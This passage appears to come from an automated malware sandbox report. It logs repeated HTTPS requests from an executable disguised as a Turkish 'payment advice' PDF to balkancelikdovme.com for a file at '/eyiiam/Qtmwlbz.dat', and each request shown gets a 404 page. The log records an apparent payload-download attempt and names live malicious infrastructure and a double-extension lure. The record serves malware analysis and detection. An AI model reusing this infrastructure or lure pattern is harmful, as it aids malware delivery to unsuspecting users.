      2024-12-16 13:20:07 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      77192.168.2.750047185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:08 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:09 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:09 GMT
      vary: User-Agent
      2024-12-16 13:20:09 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      78192.168.2.750048185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:10 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:11 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:10 GMT
      vary: User-Agent
      2024-12-16 13:20:11 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      79192.168.2.750049185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:12 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:13 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:12 GMT
      vary: User-Agent
      2024-12-16 13:20:13 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      80192.168.2.750050185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:14 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:14 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:14 GMT
      vary: User-Agent
      2024-12-16 13:20:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      81192.168.2.750051185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:16 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:16 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:16 GMT
      vary: User-Agent
      2024-12-16 13:20:16 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      82192.168.2.750052185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:18 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:18 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:18 GMT
      vary: User-Agent
      2024-12-16 13:20:18 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      83192.168.2.750053185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:20 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:20 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:20 GMT
      vary: User-Agent
      2024-12-16 13:20:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      84192.168.2.750054185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:21 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:22 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:22 GMT
      vary: User-Agent
      2024-12-16 13:20:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      85192.168.2.750055185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:23 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:24 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:24 GMT
      vary: User-Agent
      2024-12-16 13:20:24 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      86192.168.2.750056185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:25 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:26 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:25 GMT
      vary: User-Agent
      2024-12-16 13:20:26 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      87192.168.2.750057185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:27 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:27 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:27 GMT
      vary: User-Agent
      2024-12-16 13:20:27 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      88192.168.2.750058185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:29 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:29 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:29 GMT
      vary: User-Agent
      2024-12-16 13:20:29 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      89192.168.2.750059185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:31 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:31 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:31 GMT
      vary: User-Agent
      2024-12-16 13:20:31 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      90192.168.2.750060185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:33 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:33 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:33 GMT
      vary: User-Agent
